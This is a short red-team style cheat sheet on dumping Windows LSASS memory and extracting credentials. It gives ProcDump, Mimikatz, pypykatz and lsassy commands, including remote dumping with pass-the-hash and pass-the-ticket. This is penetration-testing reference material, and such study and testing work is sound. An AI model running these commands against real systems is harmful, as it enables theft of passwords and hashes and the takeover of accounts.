LSASS secrets

Overview

In Windows, the Local Security Authority Subsystem Service (LSASS) is used to enforce security on the system. The LSASS service is used in various tasks, such as overseeing password changes and login, which means that credentials and hashes are stored within the memory for the LSASS process. With administrative rights, the credentials and hashes can be extracted.

Local Dumping

Locally Dumping LSASS

ProcDump is a Windows tool from the sysinternals package and can be used to dump the process memory for LSASS. Due to being a Windows tool, this may be a more legitmate method of dumping LSASS than infiltrating other unsigned attack tools.

• https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

The following command will dump the LSASS memory to a .dmp file:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Credential Extraction

Once the lsass.dmp file has been gained and exfiltrated offline to an attack machine. Mimikatz or pypykatz can be used to extract the data.

• https://github.com/gentilkiwi/mimikatz

• https://github.com/skelsec/pypykatz

After opening mimikatz on the attack machine, the following command should be used:

sekurlsa::minidump "lsass.dmp"

sekurlsa::logonpasswords

After opening pypykatz on the attack machine, the following command should be used:

pypykatz lsa minidump lsass.dmp

Remotely Dumping (With Credentials)

LSASS can be dumped remotely using lsassy, with local administrator credentials. lsassy is a project which ties together two other well known tools, impacket and pypykatz to gain data stored in LSASS .

• https://github.com/login-securite/lsassy

Dump LSASS credentials with plaintext credentials

lsassy -d <domain> -u <user> -p <password> <target>

Dump LSASS credentials with pass-the-hash (NTLM)

lsassy -u <user> -H <NThash> <target>

Dump LSASS credentials with pass-the-ticket (Kerberos)

• Requires an environment variable to be set, see here

lsassy -k <target>